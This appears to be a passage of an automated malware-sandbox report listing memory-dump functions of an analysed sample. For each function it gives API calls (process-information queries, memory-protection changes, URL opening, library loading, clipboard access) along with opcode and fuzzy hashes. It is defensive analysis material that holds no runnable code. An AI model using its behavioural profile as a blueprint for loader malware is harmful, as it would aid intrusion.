Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 4a41e41e98bd63d7e49bacd6711dece4d6c91d7296a6578e1d969c81e30e51e4
Instruction ID: 8536ab3216574466cd089a9552ed9ed069817b01b1fe0d88ab953715f0c9c0aa
Opcode Fuzzy Hash: 4a41e41e98bd63d7e49bacd6711dece4d6c91d7296a6578e1d969c81e30e51e4
Instruction Fuzzy Hash: 3E1125B0100305DFFB349B18DDA8FAA3664EF1A328FD50281EE135B2E2C671C880C612

Uniqueness

Uniqueness Score: -1.00%

Function 013A586A, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,013A34A5,?,013A34C2,?,013A33B4,?,013A1DF5,?,?,?,?,?), ref: 013A5964

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: f8ee7b9e33ff75ff2a20c6fd6733733a70f8b80999c53a2a050a568fba5a0b2a
Instruction ID: 1ce2b2160e2524b890c0dfa784b395ca4e7f39bfecf8c682b3a68d27569dd8e2
Opcode Fuzzy Hash: f8ee7b9e33ff75ff2a20c6fd6733733a70f8b80999c53a2a050a568fba5a0b2a
Instruction Fuzzy Hash: 3F01F95235B5016DE91D525CDD2E7F72FAECB5306C3DC430CEE45EEA22E21245444632

Uniqueness

Uniqueness Score: -1.00%

Function 013A58DF, Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,013A34A5,?,013A34C2,?,013A33B4,?,013A1DF5,?,?,?,?,?), ref: 013A5964

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: d6c5af23928948f9846b15aa718cf5abc44174be3d6e365eb56520489898c95f
Instruction ID: ddfdaad5bd6bb8036bb9663d1652257425a3268e937e7d00dcee5b0c1285f5af
Opcode Fuzzy Hash: d6c5af23928948f9846b15aa718cf5abc44174be3d6e365eb56520489898c95f
Instruction Fuzzy Hash: 38F0C8512575012DE91E566CDD2BBF75BADDB2313D7CC430CEE44AF922A11205885A21

Uniqueness

Uniqueness Score: -1.00%

Function 013A57E0, Relevance: 1.5, APIs: 1, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,013A34A5,?,013A34C2,?,013A33B4,?,013A1DF5,?,?,?,?,?), ref: 013A5964

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 0372e48d19e6c8244b6b25fea78f7b3b190ef76ceda2e4fc8f45fa322faa9b07
Instruction ID: ca123165108c14778157641b06b9aac562d6194547f08cef263638102e444332
Opcode Fuzzy Hash: 0372e48d19e6c8244b6b25fea78f7b3b190ef76ceda2e4fc8f45fa322faa9b07
Instruction Fuzzy Hash: E3015E3160534AEEEB269A1CC4087683BA5EB4333DFD9939FD4529E5A6C37484C8C703

Uniqueness

Uniqueness Score: -1.00%

Function 013A592E, Relevance: 1.5, APIs: 1, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,013A34A5,?,013A34C2,?,013A33B4,?,013A1DF5,?,?,?,?,?), ref: 013A5964

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 1a23eadc535c38473fc511bb1b81547aeadd55f33cf91099e05a1d76cfc40eae
Instruction ID: 0d8745f41170c068d511d93a8816fc8457674489e39107902f95cb8bcbdf67e2
Opcode Fuzzy Hash: 1a23eadc535c38473fc511bb1b81547aeadd55f33cf91099e05a1d76cfc40eae
Instruction Fuzzy Hash: DCF0EC5009B4013EAC1E56D8ED2FFF36BADCB1307C1D4430CFD847E913240255481831

Uniqueness

Uniqueness Score: -1.00%

Function 013A528C, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,013A4F83,00000040,013A1D51,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 013A52A7

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: aadc820b3bd650c5957a57cbba95c185b7342904dbb65fe434d11568107bf341
Instruction ID: 034a05e9a4eccceb1931cfbb62df48b803d4ce8976035e562cc3f533adcd0146
Opcode Fuzzy Hash: aadc820b3bd650c5957a57cbba95c185b7342904dbb65fe434d11568107bf341
Instruction Fuzzy Hash: 8DC012E02150002E7944C928CD44D2B72AA86C4628B10C32CB832622CCC530DC044131

Uniqueness

Uniqueness Score: -1.00%

Function 20036B1F, Relevance: 6.1, APIs: 4, Instructions: 140threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 20036BB0
GetCurrentThread.KERNEL32 ref: 20036BED
GetCurrentProcess.KERNEL32 ref: 20036C2A
GetCurrentThreadId.KERNEL32 ref: 20036C83

Memory Dump Source

Source File: 0000000C.00000002.487799740.0000000020030000.00000040.00000001.sdmp, Offset: 20030000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 42960ec16f9d2875b71c8f07ee555ff6fb19b954e5a316f32d784aba084c6402
Instruction ID: aeb5a242c9594ee69aa5cf507ef0fc2e1b66b016f4dc7e9a72f6e89eaeece2e6
Opcode Fuzzy Hash: 42960ec16f9d2875b71c8f07ee555ff6fb19b954e5a316f32d784aba084c6402
Instruction Fuzzy Hash: 65517AB09043848FEB15CFA9C988B9EBFF0EF49304F14859AD449A7361D7786844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 20036B50, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 20036BB0
GetCurrentThread.KERNEL32 ref: 20036BED
GetCurrentProcess.KERNEL32 ref: 20036C2A
GetCurrentThreadId.KERNEL32 ref: 20036C83

Memory Dump Source

Source File: 0000000C.00000002.487799740.0000000020030000.00000040.00000001.sdmp, Offset: 20030000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 92950f0b48beb32e4551ac49a66bec8fe8a3f90ae1369de8158f8cc3fa5d8e29
Instruction ID: c5b7aa10c31bf16b4088d4b95239b1ba4ad1908116b7800e42b5121187cbb40b
Opcode Fuzzy Hash: 92950f0b48beb32e4551ac49a66bec8fe8a3f90ae1369de8158f8cc3fa5d8e29
Instruction Fuzzy Hash: B65126B09006498FEB14CFA9C588B9EBBF1FF48304F24856AE559A7360D7B86940CF65

Uniqueness

Uniqueness Score: -1.00%

Function 013A3851, Relevance: 4.5, APIs: 1, Strings: 1, Instructions: 1011COMMON

Download Yara Rule

Strings

-$_", xrefs: 013A385B

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -$_"
API String ID: 0-2753251004
Opcode ID: f35d2aa0717b5a49aee58e25545fd0adfc70ff2d08a05bd1ef26c1a8b883a294
Instruction ID: 000083d57f4c0bd51ecf43ba8326ff7ba104b31685bac4a3e9273898837b97c4
Opcode Fuzzy Hash: f35d2aa0717b5a49aee58e25545fd0adfc70ff2d08a05bd1ef26c1a8b883a294
Instruction Fuzzy Hash: 98325A910AB5017EE91912ECAD2FFF33FADF92075CAD4431CFEC9ABA136442854519B2

Uniqueness

Uniqueness Score: -1.00%

Function 013A2C6D, Relevance: 3.1, APIs: 2, Instructions: 144networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(013A3227,00000000,00000000,00000000,00000000,?,013A33C9,013A36CB,?,?,?,?,?,013A34A5,?,013A34C2), ref: 013A2CB7
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,013A33C9,013A36CB), ref: 013A2D5E

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 131d86617947dd6d0cfb1291ec0a1c57aa3ffdfa3aa120351a551b351e174c1b
Instruction ID: a6795283bb949390fe033981343eca7da00e590ac8b25d1eb3a99ee3570c73fd
Opcode Fuzzy Hash: 131d86617947dd6d0cfb1291ec0a1c57aa3ffdfa3aa120351a551b351e174c1b
Instruction Fuzzy Hash: 554106601893826FEB324B64DC1AFF73FA8DF11208F848159EE88DF593E67189459731

Uniqueness

Uniqueness Score: -1.00%

Function 013A2C6A, Relevance: 3.1, APIs: 2, Instructions: 89networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(013A3227,00000000,00000000,00000000,00000000,?,013A33C9,013A36CB,?,?,?,?,?,013A34A5,?,013A34C2), ref: 013A2CB7
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,013A33C9,013A36CB), ref: 013A2D5E

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: c0d8eb930de8e8b1cf7df766d4be1e0f01e9bda285622c7004508b2ad4b45672
Instruction ID: 817c0559b171785044522c4e80415cff4e4a6bd795f078f5f755ff5bc99aa1bb
Opcode Fuzzy Hash: c0d8eb930de8e8b1cf7df766d4be1e0f01e9bda285622c7004508b2ad4b45672
Instruction Fuzzy Hash: 29314F3028038AAFEF718F24CD45FEE3A69EF04748F808425BE4EAE690D77196549B10

Uniqueness

Uniqueness Score: -1.00%

Function 013A103F, Relevance: 2.6, APIs: 1, Instructions: 1062threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 013A1A2B

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 0041d04a69dcd99493b4bc4114edc9ad33edf67e4aefd9ca389568b0d1674777
Instruction ID: 68b308714637f351afe17e13f692831fdb74aeba25f4b4b96cc631812ed04a92
Opcode Fuzzy Hash: 0041d04a69dcd99493b4bc4114edc9ad33edf67e4aefd9ca389568b0d1674777
Instruction Fuzzy Hash: 45115970104345DFF7209F28CDB8FA63A64EF0A328FD502C6E9524B1E3C660C880C712

Uniqueness

Uniqueness Score: -1.00%

Function 013A19ED, Relevance: 1.8, APIs: 1, Instructions: 251threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 013A1A2B

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 216869aa813d395498d72f00a4a8d9adc4b25921cbe2242b351233922ae620ee
Instruction ID: 44636495e93b2d7c79db21089047ecae150ab3f65f0275c7b4b9b5037f38153c
Opcode Fuzzy Hash: 216869aa813d395498d72f00a4a8d9adc4b25921cbe2242b351233922ae620ee
Instruction Fuzzy Hash: F3717A701556416FFB255BB8DC6AFF33BACEB1125CFC44398E8C59B2A3D62085418B71

Uniqueness

Uniqueness Score: -1.00%

Function 013A2D0E, Relevance: 1.6, APIs: 1, Instructions: 119networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,013A33C9,013A36CB), ref: 013A2D5E

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 82e28db6bbc6e78fd7c8a4546d11f1957abd550bfbd1cc24e7e7ef42e292c673
Instruction ID: 6595659a2bc19bda651bddf8cbf08f5f3efa97eac9140684c399d0555c90e98d
Opcode Fuzzy Hash: 82e28db6bbc6e78fd7c8a4546d11f1957abd550bfbd1cc24e7e7ef42e292c673
Instruction Fuzzy Hash: A431026104E3C25FDB334B64DD26BF73F6C8F12118F88419AED88DE593D22585099BB2

Uniqueness

Uniqueness Score: -1.00%

Function 20035184, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 200352A2

Memory Dump Source

Source File: 0000000C.00000002.487799740.0000000020030000.00000040.00000001.sdmp, Offset: 20030000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b2b339e8c4e69b633f18fb80b4eef3b2d14d013d2838fe6b8c1f1fa394c1dadd
Instruction ID: a259e7cfbcd53a4ddccd4d14d56d74ddee1b2b90538d6d60a39075d245d9c7d9
Opcode Fuzzy Hash: b2b339e8c4e69b633f18fb80b4eef3b2d14d013d2838fe6b8c1f1fa394c1dadd
Instruction Fuzzy Hash: D551CDB1D003489FDB15CFD9C880ADEBBB5BF89314F20812AE819AB210D774A885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 20035190, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 200352A2

Memory Dump Source

Source File: 0000000C.00000002.487799740.0000000020030000.00000040.00000001.sdmp, Offset: 20030000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ac418cad96b47b0653d59d874bf74e602507d942241056441069219ccfdab356
Instruction ID: d69dae3263f5a9fcc373c4a0a115b770052c8b0d32128fe5eb68058aad10116d
Opcode Fuzzy Hash: ac418cad96b47b0653d59d874bf74e602507d942241056441069219ccfdab356
Instruction Fuzzy Hash: 1141CFB1D003499FDF15CFD9C884ADEBBB5BF88314F64812AE819AB210D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 20036E3A, Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20036DFF

Memory Dump Source

Source File: 0000000C.00000002.487799740.0000000020030000.00000040.00000001.sdmp, Offset: 20030000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bd5fdf5db2849148d2addfa1d16c0b29653574ecfaacf440e9df69092303d892
Instruction ID: fcb5ec5788a63306a6f8ea5979e29c9e4ca5b614627189f65cecac1a4082f306
Opcode Fuzzy Hash: bd5fdf5db2849148d2addfa1d16c0b29653574ecfaacf440e9df69092303d892
Instruction Fuzzy Hash: 3E411C78B446449FF701CFA5C994BA9BBF6FB49714F104029EA069B7E1C7785801EF22

Uniqueness

Uniqueness Score: -1.00%

Function 20036964, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 20037CF9

Memory Dump Source

Source File: 0000000C.00000002.487799740.0000000020030000.00000040.00000001.sdmp, Offset: 20030000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: c669cc909b98913830627ab3858b4a52a66deefb159042ed6eccbc30fd7f6de3
Instruction ID: acb50ba9918828823f885357c46bffe1aef8530608e0c7f1dc35a1d6eff6592b
Opcode Fuzzy Hash: c669cc909b98913830627ab3858b4a52a66deefb159042ed6eccbc30fd7f6de3
Instruction Fuzzy Hash: 83414BB5900349CFEB25CF99C484BAABBF5FF88314F248559E518AB321C774A941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 20B5CA0D, Relevance: 1.6, APIs: 1, Instructions: 77comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 20B5CAA0

Memory Dump Source

Source File: 0000000C.00000002.488459928.0000000020B50000.00000040.00000001.sdmp, Offset: 20B50000, based on PE: false

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 1f8623e95c7984a6ea1953a4968646e4edc05d2adfc97fa1cc0c5bc9c115efa8
Instruction ID: 13e4e8e83aa565af0ac0398ced7a6308ff3dd58b734f56780e4419534661ae4d
Opcode Fuzzy Hash: 1f8623e95c7984a6ea1953a4968646e4edc05d2adfc97fa1cc0c5bc9c115efa8
Instruction Fuzzy Hash: 0B3114B0D052589FDB20CF99C484BDEBFF1AF48314F14805AE405BB295D7B46849CB61

Uniqueness

Uniqueness Score: -1.00%

Function 20B5C2F8, Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 20B5CAA0

Memory Dump Source

Source File: 0000000C.00000002.488459928.0000000020B50000.00000040.00000001.sdmp, Offset: 20B50000, based on PE: false

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 5a92e75f104f618dca17bc38e9f13cd867b39907904f17e6c46afea79c37769f
Instruction ID: 3353584e7b86852e9789ae6e23ff366e4f277d0304d1804010cd5fef14aa96a2
Opcode Fuzzy Hash: 5a92e75f104f618dca17bc38e9f13cd867b39907904f17e6c46afea79c37769f
Instruction Fuzzy Hash: 1031C2B0D0024C9FDB20CF95C585BDEBFF5AB48315F148069E504BB394D7B56949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013A42A1, Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,013A4F0C,013A1D51,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 013A43B1

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f34d75cf0b2cc38e4a61d42c04f3fefba99c7f4ad776115344b2f9475944c665
Instruction ID: d31b5665f9b3f95a0e28b180c3f5cff66bc16e7e3cd71bd980b867b32b7f4d82
Opcode Fuzzy Hash: f34d75cf0b2cc38e4a61d42c04f3fefba99c7f4ad776115344b2f9475944c665
Instruction Fuzzy Hash: F701494018640579DA1536FCBD1ABFB1B5CCB214ADFDC0228FAC06699381D285655A33

Uniqueness

Uniqueness Score: -1.00%

Function 20036D72, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20036DFF

Memory Dump Source

Source File: 0000000C.00000002.487799740.0000000020030000.00000040.00000001.sdmp, Offset: 20030000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 58212113d16673d3613a23ce102e5033e97b346595ddffa50aa77c31f2f4d151
Instruction ID: 4dc4e03506b72eaad34745da92956608c0ee554488064fc1b5a2263376e3d1a3
Opcode Fuzzy Hash: 58212113d16673d3613a23ce102e5033e97b346595ddffa50aa77c31f2f4d151
Instruction Fuzzy Hash: AB21E0B59002489FDB10CFAAD484AEEFBF4FF48314F14856AE955A7310D3B8A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 20036D78, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20036DFF

Memory Dump Source

Source File: 0000000C.00000002.487799740.0000000020030000.00000040.00000001.sdmp, Offset: 20030000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 19f232adadbfbb17efc1ac418909a0a7795d3a13fdee7e32bb6c5d0f458ec540
Instruction ID: 20389ca388a8d613af69f56ef8f20a4010554ae51c3055cb023c3d407b609404
Opcode Fuzzy Hash: 19f232adadbfbb17efc1ac418909a0a7795d3a13fdee7e32bb6c5d0f458ec540
Instruction Fuzzy Hash: C421D3B59002489FDB10CFAAD884ADEFBF4FB48314F14842AE954A7310D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 2003BDF9, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 2003BE82

Memory Dump Source

Source File: 0000000C.00000002.487799740.0000000020030000.00000040.00000001.sdmp, Offset: 20030000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 3eb07be2bdfe416dd16b157e9acc05aa576f2dd3ffe013425c9911f95ded52e4
Instruction ID: 73566e811c91782576a360d23cb5105a8e3e2af571c1a76a4ddf11a25aae54c2
Opcode Fuzzy Hash: 3eb07be2bdfe416dd16b157e9acc05aa576f2dd3ffe013425c9911f95ded52e4
Instruction Fuzzy Hash: 5721AC71804788CFEB20DFA9C8487CEBFF4FB4A708F14842AD504A7612C378A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013A2965, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 013A299B

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5e424ad2cd393bb9e915dfed46531afa9f9ea14b4a7705276feab77dbca710f9
Instruction ID: b503dba47e474d37f1ae9cf53125c70cd831efa10c26789b3a67d41c7e614b1a
Opcode Fuzzy Hash: 5e424ad2cd393bb9e915dfed46531afa9f9ea14b4a7705276feab77dbca710f9
Instruction Fuzzy Hash: EEF07D820AED412CF63743A45D3AEF37FADC62287D3C4034EE9C4AAA13144145265175

Uniqueness

Uniqueness Score: -1.00%

Function 2003BE08, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 2003BE82

Memory Dump Source

Source File: 0000000C.00000002.487799740.0000000020030000.00000040.00000001.sdmp, Offset: 20030000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: f88b1d8cd475d749df334ad3f68863bf2909b0118fb49b0a2e396ca938478eee
Instruction ID: eb7a3a7e305d58343e225bb2247601cc63892afc632fa5c8c7e0c363d96b55ed
Opcode Fuzzy Hash: f88b1d8cd475d749df334ad3f68863bf2909b0118fb49b0a2e396ca938478eee
Instruction Fuzzy Hash: DD118E71904749CFEB20DFA9C848BCEBBF4FB46718F14842AD904A7601C779A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013A4C4A, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,013A4F0C,013A1D51,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 013A43B1

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2944cae23b5a1dc5ddd117b3b6a09c91a70fb18c5e631af07dc8ae82c4ad3913
Instruction ID: c3bd622207405d51399149d2e968224336081ae85ce95bfccbc5bec4182a2739
Opcode Fuzzy Hash: 2944cae23b5a1dc5ddd117b3b6a09c91a70fb18c5e631af07dc8ae82c4ad3913
Instruction Fuzzy Hash: B6F0224062814EEACF3136BC7A143FC250DCF222ECFEC4526ED835298293D284948263

Uniqueness

Uniqueness Score: -1.00%

Function 20B58E64, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,20B5BD07), ref: 20B5BD9F

Memory Dump Source

Source File: 0000000C.00000002.488459928.0000000020B50000.00000040.00000001.sdmp, Offset: 20B50000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: b92f36fd9efb3e25aa1a84e01c01967b1621bb6b8a79e21c3219abebb8a8b98a
Instruction ID: f5ea3f124e0d82e11901bc70cb19b9e99ce5b89a31118e3812e947c383ed4f3a
Opcode Fuzzy Hash: b92f36fd9efb3e25aa1a84e01c01967b1621bb6b8a79e21c3219abebb8a8b98a
Instruction Fuzzy Hash: A21106B19042498FCB20DF9AD484BDEFBF4EB49314F20846AD959B7350D7B8A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 20B5BD39, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,20B5BD07), ref: 20B5BD9F

Memory Dump Source

Source File: 0000000C.00000002.488459928.0000000020B50000.00000040.00000001.sdmp, Offset: 20B50000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 077e6aa2f876f887e9a1352315734c1edb20c83b3fc2e362f67c827241a47ab1
Instruction ID: 16d474e8da126a20b34abce2b37c81d22be7a86050bdf6ea8c449ad2ed30567a
Opcode Fuzzy Hash: 077e6aa2f876f887e9a1352315734c1edb20c83b3fc2e362f67c827241a47ab1
Instruction Fuzzy Hash: C11136B19042488FCB10CF99D484BDFFBF4EB88324F20846AD559A7250C3B4A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 20B590D4, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 20B5C925

Memory Dump Source

Source File: 0000000C.00000002.488459928.0000000020B50000.00000040.00000001.sdmp, Offset: 20B50000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 9086880a430a16d7dbd995e59bb92604bce9c08161e5dfaf8f80d3093b272dc0
Instruction ID: 7637a0e2c10b0cd340728c5260730bdebe2be42ca46e95c448a91f5333a73b22
Opcode Fuzzy Hash: 9086880a430a16d7dbd995e59bb92604bce9c08161e5dfaf8f80d3093b272dc0
Instruction Fuzzy Hash: DA1115B59003488FDB20CF9AD484BDEBBF4EB48314F10846AD559B7600C3B8A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 20B5C8C8, Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 20B5C925

Memory Dump Source

Source File: 0000000C.00000002.488459928.0000000020B50000.00000040.00000001.sdmp, Offset: 20B50000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: dcbe71a342cd01ed44c99657474dcc1e73fb4b5b8e7c5e8e1a95bb0fdc7e65bb
Instruction ID: 2c4daec641820bca5735383e79165730983a8e73f9572f982bb9e9a1da6d0f47
Opcode Fuzzy Hash: dcbe71a342cd01ed44c99657474dcc1e73fb4b5b8e7c5e8e1a95bb0fdc7e65bb
Instruction Fuzzy Hash: 2F1100B59002888EDB20CFAAD484BDEBBF4EB48324F10855AD559A7610C3B8A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013A4309, Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,013A4F0C,013A1D51,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 013A43B1

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 65b069e21e8a9a96ee6e398f76ff062971216851bd841754730ef39fbe81995f
Instruction ID: b73d2794692b05fcb32fb134dbc84c1e25ae30a7a310b79be05c0c35c944a4d1
Opcode Fuzzy Hash: 65b069e21e8a9a96ee6e398f76ff062971216851bd841754730ef39fbe81995f
Instruction Fuzzy Hash: 40E0D89014005DBACF203BBEB940BBD190CCF211ECFDC4036F69191481C7E684A5C763

Uniqueness

Uniqueness Score: -1.00%

Function 013A2953, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 013A299B

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1709e683d86f0307a9fcd94266bf2e66b6831f28b945462c94123d61221acbf9
Instruction ID: 357179dba3a3385d9ec4b54ad4e390d460c0bbaf0c14c608c08ef32d5ee62e28
Opcode Fuzzy Hash: 1709e683d86f0307a9fcd94266bf2e66b6831f28b945462c94123d61221acbf9
Instruction Fuzzy Hash: 9DD08C30B88304BAF6308A30CD17FE7A2548B80F80F608009BB0A3C0C405F5B560C119

Uniqueness

